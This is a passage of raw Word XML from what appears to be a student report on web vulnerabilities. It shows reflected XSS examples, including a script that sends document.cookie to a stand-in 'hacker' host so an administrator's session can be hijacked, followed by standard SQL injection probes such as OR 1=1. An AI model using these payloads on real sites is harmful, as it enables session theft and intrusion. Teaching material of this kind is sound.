        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B. XSS Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259"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&lt;b&gt; Bold Script&lt;/b&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C57EF50" wp14:editId="744268F3">
            <wp:extent cx="52673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7325" cy="2124075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA76DA" w:rsidRDefault="00AA76DA" w:rsidP="00AA76DA">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fiq</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4</w:t>
      </w:r>
      <w:r w:rsidR="00F168C7">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sidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reflected XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> example</w:t>
      </w:r>
      <w:r w:rsidR="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRDefault="001076B8" w:rsidP="001076B8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRDefault="001076B8" w:rsidP="001076B8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRDefault="001076B8" w:rsidP="001076B8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRDefault="001076B8" w:rsidP="001076B8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRDefault="001076B8" w:rsidP="001076B8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRDefault="001076B8" w:rsidP="001076B8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRPr="00AA76DA" w:rsidRDefault="001076B8" w:rsidP="001076B8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA76DA" w:rsidRDefault="00AA76DA" w:rsidP="006F2A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;font </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F2A49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="red"&gt; Coloured script&lt;/font&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B270A" w:rsidRDefault="006B270A" w:rsidP="006F2A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F2A49" w:rsidRDefault="006F2A49" w:rsidP="006F2A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D4A9C38" wp14:editId="40726DC0">
            <wp:extent cx="5191208"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00650" cy="1832126"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRPr="00AA76DA" w:rsidRDefault="00F168C7" w:rsidP="001076B8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360"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Fiq</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4.2 </w:t>
      </w:r>
      <w:r w:rsidR="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001076B8" w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reflected XSS</w:t>
      </w:r>
      <w:r w:rsidR="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> example 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRDefault="001076B8" w:rsidP="006F2A49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B270A" w:rsidRDefault="00771320" w:rsidP="006B270A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259"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&lt;script&gt; alert(“Website is </w:t>
      </w:r>
      <w:r w:rsidR="006B270A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerable”)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B270A" w:rsidRDefault="006B270A" w:rsidP="001076B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A2648E" wp14:editId="6F5C43AF">
            <wp:extent cx="3295650" cy="197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95650" cy="1971675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRPr="00AA76DA" w:rsidRDefault="00F168C7" w:rsidP="001076B8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360"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Fiq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r w:rsidR="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001076B8" w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRDefault="001076B8" w:rsidP="006B270A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B15619" w:rsidRDefault="00B15619" w:rsidP="006B270A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B15619" w:rsidRPr="00B15619" w:rsidRDefault="00B15619" w:rsidP="00B15619">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B15619">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;SCRIPT&gt;var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B270A" w:rsidRPr="00B15619" w:rsidRDefault="00B15619" w:rsidP="00B15619">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Si</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15619">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tting on the other end, at the web server, you will be receiving hits where after a double space is the user's cookie. If an administrator clicks the link, an attacker could steal the session ID and hijack the session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="006F2A49" w:rsidRDefault="009A7287" w:rsidP="006F2A49">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="009F6965" w:rsidRDefault="009A7287" w:rsidP="00F754EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284" w:right="30"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Result and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00F754EB" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00620884" w:rsidRPr="009F6965">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etect SQL injection vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:t>The majority of SQL injection vulnerabilities can be found quickly and reliably using Burp Suite's </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="009F6965">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>web vulnerability scanner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009F6965">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:t>SQL injection can be detected manually by using a systematic set of tests against every entry point in the application. This typically involves:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="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Submitting the single quote character </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> and looking for errors or other anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">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Submitting some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a different value, and looking for systematic differences in the resulting application responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="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Submitting Boolean conditions such as </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>OR 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>OR 1=2, and</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> looking for differences in the application's responses.</w:t>
      </w:r>
    </w:p>
